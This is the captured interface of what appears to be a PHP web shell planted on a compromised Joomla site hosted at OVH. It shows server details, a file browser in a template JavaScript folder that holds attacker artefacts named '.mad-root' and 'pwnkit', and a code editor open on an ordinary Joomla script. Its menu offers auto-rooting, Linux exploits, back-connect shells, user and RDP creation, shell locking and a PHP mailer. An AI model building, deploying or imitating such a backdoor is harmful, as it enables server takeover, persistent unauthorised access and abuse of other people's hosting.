Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
media /
com_templates /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
admin-template-compare-es5.js
1.89
KB
-rw----r--
admin-template-compare-es5.min...
818
B
-rw----r--
admin-template-compare-es5.min...
507
B
-rw----r--
admin-template-compare.js
1.69
KB
-rw----r--
admin-template-compare.min.js
780
B
-rw----r--
admin-template-compare.min.js....
491
B
-rw----r--
admin-template-toggle-assignme...
742
B
-rw----r--
admin-template-toggle-assignme...
338
B
-rw----r--
admin-template-toggle-assignme...
206
B
-rw----r--
admin-template-toggle-assignme...
631
B
-rw----r--
admin-template-toggle-assignme...
276
B
-rw----r--
admin-template-toggle-assignme...
188
B
-rw----r--
admin-template-toggle-switch-e...
3.43
KB
-rw----r--
admin-template-toggle-switch-e...
1.76
KB
-rw----r--
admin-template-toggle-switch-e...
484
B
-rw----r--
admin-template-toggle-switch.j...
3.16
KB
-rw----r--
admin-template-toggle-switch.m...
1.72
KB
-rw----r--
admin-template-toggle-switch.m...
467
B
-rw----r--
admin-templates-default-es5.js
5.05
KB
-rw----r--
admin-templates-default-es5.mi...
2.62
KB
-rw----r--
admin-templates-default-es5.mi...
794
B
-rw----r--
admin-templates-default.js
4.71
KB
-rw----r--
admin-templates-default.min.js
2.49
KB
-rw----r--
admin-templates-default.min.js...
778
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin-template-compare.js
/** * @copyright (C) 2018 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ (() => { document.addEventListener('DOMContentLoaded', () => { const decodeHtmlspecialChars = text => { const map = { '&': '&', '&': '&', '<': '<', '>': '>', '"': '"', ''': "'", '’': '’', '‘': '‘', '–': '–', '—': '—', '…': '…', '”': '”' }; /* eslint-disable */ return text.replace(/\&[\w\d\#]{2,5}\;/g, m => { const n = map[m]; return n; }); }; const compare = (original, changed) => { const display = changed.nextElementSibling; let color = ''; let pre = null; const diff = Diff.diffLines(original.innerHTML, changed.innerHTML); const fragment = document.createDocumentFragment(); /* eslint-enable */ diff.forEach(part => { if (part.added) { color = '#a6f3a6'; } else if (part.removed) { color = '#f8cbcb'; } else { color = ''; } pre = document.createElement('pre'); pre.style.backgroundColor = color; pre.className = 'diffview'; pre.appendChild(document.createTextNode(decodeHtmlspecialChars(part.value))); fragment.appendChild(pre); }); display.appendChild(fragment); }; const diffs = [].slice.call(document.querySelectorAll('#original')); for (let i = 0, l = diffs.length; i < l; i += 1) { compare(diffs[i], diffs[i].nextElementSibling); } }); })();
Close